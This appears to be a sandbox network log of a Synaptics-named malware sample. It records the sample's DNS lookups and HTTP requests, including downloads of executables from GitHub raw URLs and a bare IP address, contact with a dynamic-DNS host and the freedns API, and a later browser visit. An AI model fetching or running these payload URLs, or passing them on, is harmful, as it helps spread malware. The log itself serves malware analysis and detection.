Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Sat, 01 Feb 2025 09:15:20 GMT
ETag: "7063b-62d1119301260"
Cache-Control: max-age=300
Expires: Sat, 01 Feb 2025 09:22:51 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Sat, 01 Feb 2025 09:21:17 GMT
Age: 206
X-Served-By: cache-fra-eddf8230087-FRA, cache-lon420112-LON
X-Cache: HIT, HIT
X-Cache-Hits: 102, 3
X-Timer: S1738401677.445327,VS0,VE0
Vary: Accept-Encoding
GET

https://urlhaus.abuse.ch/downloads/text_online/

._cache_Synaptics.exe

Remote address:

151.101.130.49:443

Request

GET /downloads/text_online/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 460347
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';
Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Sat, 01 Feb 2025 09:15:20 GMT
ETag: "7063b-62d1119301260"
Cache-Control: max-age=300
Expires: Sat, 01 Feb 2025 09:22:51 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Sat, 01 Feb 2025 09:21:17 GMT
Age: 207
X-Served-By: cache-fra-eddf8230087-FRA, cache-lcy-eglc8600041-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 41, 23
X-Timer: S1738401678.594546,VS0,VE0
Vary: Accept-Encoding
DNS

github.com

._cache_Synaptics.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

raw.githubusercontent.com

._cache_Synaptics.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.110.133
GET

https://raw.githubusercontent.com/seven7174j/Repo/main/NVIDIA.exe

._cache_Synaptics.exe

Remote address:

185.199.109.133:443

Request

GET /seven7174j/Repo/main/NVIDIA.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 10752
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "14becc225283a517be8f152bd57ae7bb69bdfdd62008ef2d15346fa0fc7015b8"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: D682:261D54:916F4:D94DF:679DE779
Accept-Ranges: bytes
Date: Sat, 01 Feb 2025 09:21:18 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600089-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1738401678.230346,VS0,VE125
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: a7334f6b3c97ccecaf8c5df6fdfa7b9a5726010b
Expires: Sat, 01 Feb 2025 09:26:18 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/cavxsy/crazy.spoofer/refs/heads/main/loader.exe

._cache_Synaptics.exe

Remote address:

185.199.109.133:443

Request

GET /cavxsy/crazy.spoofer/refs/heads/main/loader.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 188416
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "e9abc51a545367a92e73c329bcf37423a03937680796a010158d670c8fd093c2"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: CB42:17718B:1F7FBE:2BD20B:679DE7A3
Accept-Ranges: bytes
Date: Sat, 01 Feb 2025 09:21:41 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600089-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1738401701.997839,VS0,VE329
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 26b8a852821921fead8ef0c9916106fbfbcbd3c1
Expires: Sat, 01 Feb 2025 09:26:41 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/hwangyounggul33/windows10/refs/heads/main/PrivacyPolicy.exe

._cache_Synaptics.exe

Remote address:

185.199.109.133:443

Request

GET /hwangyounggul33/windows10/refs/heads/main/PrivacyPolicy.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 965088
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "c7a7fa4c8f567a72bb2cefe60da23f30997a9f14e8da0911ee7e03253b633103"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 25C6:3E8B32:1D35A9:29895D:679DE7D2
Accept-Ranges: bytes
Date: Sat, 01 Feb 2025 09:22:26 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600089-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1738401746.336455,VS0,VE344
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 3f43e2831d8ea5e3bf9736058721a6f5d0f0af44
Expires: Sat, 01 Feb 2025 09:27:26 GMT
Source-Age: 0
DNS

49.130.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

49.130.101.151.in-addr.arpa

IN PTR

Response
DNS

215.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

215.156.26.20.in-addr.arpa

IN PTR

Response
DNS

97.32.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.32.109.52.in-addr.arpa

IN PTR

Response
GET

http://203.232.37.151/pornhub_downloader.exe

._cache_Synaptics.exe

Remote address:

203.232.37.151:80

Request

GET /pornhub_downloader.exe HTTP/1.1
Host: 203.232.37.151
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Last-Modified: Fri, 17 May 2024 08:44:36 GMT
Accept-Ranges: bytes
ETag: "5c4847236a8da1:0"
Server: Microsoft-IIS/10.0
Date: Sat, 01 Feb 2025 09:21:18 GMT
Content-Length: 90112
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5bf812b2d0b042fca159418a1a9d5190&localId=w:E9D43C1E-0C9B-6222-E427-E1798E5D5858&deviceId=6896210250783501&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5bf812b2d0b042fca159418a1a9d5190&localId=w:E9D43C1E-0C9B-6222-E427-E1798E5D5858&deviceId=6896210250783501&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=3D19F7F41B8468D32DECE2721A64694E; domain=.bing.com; expires=Thu, 26-Feb-2026 09:21:19 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9A0045DD98FF4B5E80F048D5095029C9 Ref B: LON04EDGE1019 Ref C: 2025-02-01T09:21:19Z
date: Sat, 01 Feb 2025 09:21:18 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5bf812b2d0b042fca159418a1a9d5190&localId=w:E9D43C1E-0C9B-6222-E427-E1798E5D5858&deviceId=6896210250783501&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5bf812b2d0b042fca159418a1a9d5190&localId=w:E9D43C1E-0C9B-6222-E427-E1798E5D5858&deviceId=6896210250783501&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3D19F7F41B8468D32DECE2721A64694E

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=ipVqtFEHJIkGx_4wSuEXd2_N8NjFMB4D5z94RhbymHA; domain=.bing.com; expires=Thu, 26-Feb-2026 09:21:19 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CD35E1E5E0B74B0E88B3EE4C00D21909 Ref B: LON04EDGE1019 Ref C: 2025-02-01T09:21:19Z
date: Sat, 01 Feb 2025 09:21:18 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5bf812b2d0b042fca159418a1a9d5190&localId=w:E9D43C1E-0C9B-6222-E427-E1798E5D5858&deviceId=6896210250783501&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5bf812b2d0b042fca159418a1a9d5190&localId=w:E9D43C1E-0C9B-6222-E427-E1798E5D5858&deviceId=6896210250783501&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3D19F7F41B8468D32DECE2721A64694E; MSPTC=ipVqtFEHJIkGx_4wSuEXd2_N8NjFMB4D5z94RhbymHA

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9BBD53F00CB74C35AC4F9762B607A7B2 Ref B: LON04EDGE1019 Ref C: 2025-02-01T09:21:19Z
date: Sat, 01 Feb 2025 09:21:18 GMT
DNS

66.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

66.160.190.20.in-addr.arpa

IN PTR

Response
DNS

46.242.123.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

46.242.123.52.in-addr.arpa

IN PTR

Response
DNS

151.37.232.203.in-addr.arpa

Remote address:

8.8.8.8:53

Request

151.37.232.203.in-addr.arpa

IN PTR

Response
DNS

133.109.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.109.199.185.in-addr.arpa

IN PTR

Response

133.109.199.185.in-addr.arpa

IN PTR

cdn-185-199-109-133githubcom
DNS

10.28.171.150.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.28.171.150.in-addr.arpa

IN PTR

Response
DNS

xred.mooo.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

xred.mooo.com

IN A

Response
DNS

freedns.afraid.org

Synaptics.exe

Remote address:

8.8.8.8:53

Request

freedns.afraid.org

IN A

Response

freedns.afraid.org

IN A

69.42.215.252
GET

http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Synaptics.exe

Remote address:

69.42.215.252:80

Request

GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 01 Feb 2025 09:21:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
DNS

252.215.42.69.in-addr.arpa

Remote address:

8.8.8.8:53

Request

252.215.42.69.in-addr.arpa

IN PTR

Response
DNS

252.215.42.69.in-addr.arpa

Remote address:

8.8.8.8:53

Request

252.215.42.69.in-addr.arpa

IN PTR

Response
DNS

www.pornhub.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.pornhub.com

IN A

Response

www.pornhub.com

IN CNAME

pornhub.com

pornhub.com

IN A

66.254.114.41
DNS

166.190.18.2.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

166.190.18.2.in-addr.arpa

IN PTR

Response

166.190.18.2.in-addr.arpa

IN PTR

a2-18-190-166deploystaticakamaitechnologiescom
GET

https://www.pornhub.com/

msedge.exe

Remote address:

66.254.114.41:443

Request

GET / HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: openresty
date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: text/html; charset=UTF-8
set-cookie: platform=pc; expires=Sat, 08 Feb 2025 09:21:21 GMT; Max-Age=604800; path=/; domain=pornhub.com; secure
set-cookie: ss=285997765363897800; expires=Sun, 01 Feb 2026 09:21:21 GMT; Max-Age=31536000; path=/; domain=pornhub.com; secure
set-cookie: comp_detect-cookies=41809.100000; expires=Mon, 03 Mar 2025 09:21:21 GMT; Max-Age=2592000; path=/; domain=pornhub.com; secure
x-frame-options: SAMEORIGIN
cache-control: no-cache, no-store, must-revalidate
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
content-encoding: br
set-cookie: __s=679DE791-42FE722901BB3525F4-BB55572; Secure; Samesite=None
set-cookie: __l=679DE791-42FE722901BB3525F4-BB55572; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1738401681%2C%22hash%22%3A%22bb0cc0bb54986d82f1c5783a8b479079%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hbresp=header&hb=1EBD11A3-881C-43E7-801C-DBD18D260596&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%2C%7B%22zone%22%3A2184351%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1738401681%2C%22hash%22%3A%22bb0cc0bb54986d82f1c5783a8b479079%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hbresp=header&hb=1EBD11A3-881C-43E7-801C-DBD18D260596&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%2C%7B%22zone%22%3A2184351%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=285997765363897800
cookie: comp_detect-cookies=41809.100000
cookie: __s=679DE791-42FE722901BB3525F4-BB55572
cookie: __l=679DE791-42FE722901BB3525F4-BB55572

Response

HTTP/2.0 202

server: openresty
date: Sat, 01 Feb 2025 09:21:21 GMT
content-length: 0
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1738401681%2C%22hash%22%3A%22bb0cc0bb54986d82f1c5783a8b479079%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=1EBD11A3-881C-43E7-801C-DBD18D260596&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1738401681%2C%22hash%22%3A%22bb0cc0bb54986d82f1c5783a8b479079%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=1EBD11A3-881C-43E7-801C-DBD18D260596&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=285997765363897800
cookie: comp_detect-cookies=41809.100000
cookie: __s=679DE791-42FE722901BB3525F4-BB55572
cookie: __l=679DE791-42FE722901BB3525F4-BB55572

Response

HTTP/2.0 200

server: openresty
date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: application/json
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
headerbiding: 1
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-headers: Content-Type
access-control-max-age: 86400
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1738401681%2C%22hash%22%3A%22bb0cc0bb54986d82f1c5783a8b479079%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=1EBD11A3-881C-43E7-801C-DBD18D260596&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A2184351%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1738401681%2C%22hash%22%3A%22bb0cc0bb54986d82f1c5783a8b479079%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=1EBD11A3-881C-43E7-801C-DBD18D260596&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A2184351%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=285997765363897800
cookie: comp_detect-cookies=41809.100000
cookie: __s=679DE791-42FE722901BB3525F4-BB55572
cookie: __l=679DE791-42FE722901BB3525F4-BB55572

Response

HTTP/2.0 200

server: openresty
date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: application/json
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
headerbiding: 1
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-headers: Content-Type
access-control-max-age: 86400
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
POST

https://www.pornhub.com/_i?type=event&event=consent-modal-open&origin=homepage&origin_url=%2F

msedge.exe

Remote address:

66.254.114.41:443

Request

POST /_i?type=event&event=consent-modal-open&origin=homepage&origin_url=%2F HTTP/2.0
host: www.pornhub.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded; charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=285997765363897800
cookie: comp_detect-cookies=41809.100000
cookie: __s=679DE791-42FE722901BB3525F4-BB55572
cookie: __l=679DE791-42FE722901BB3525F4-BB55572
cookie: cookieConsent=1

Response

HTTP/2.0 200

content-length: 0
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/front/menu_all_cached?segment=straight&token=MTczODQwMTY4MYWp8IhWD2fH8BFd7quoCGMsn1Qoyhze5STyec9MqPM-aB_r_k5kXkRY-83rt9E-xWHw84bCACqGFu7cAOPoj5c.

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /front/menu_all_cached?segment=straight&token=MTczODQwMTY4MYWp8IhWD2fH8BFd7quoCGMsn1Qoyhze5STyec9MqPM-aB_r_k5kXkRY-83rt9E-xWHw84bCACqGFu7cAOPoj5c. HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded; charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=285997765363897800
cookie: comp_detect-cookies=41809.100000
cookie: __s=679DE791-42FE722901BB3525F4-BB55572
cookie: __l=679DE791-42FE722901BB3525F4-BB55572
cookie: cookieConsent=1

Response

HTTP/2.0 200

server: openresty
date: Sat, 01 Feb 2025 09:21:22 GMT
content-type: text/html; charset=UTF-8
x-frame-options: SAMEORIGIN
cache-control: no-cache, no-store, must-revalidate
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
content-encoding: br
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

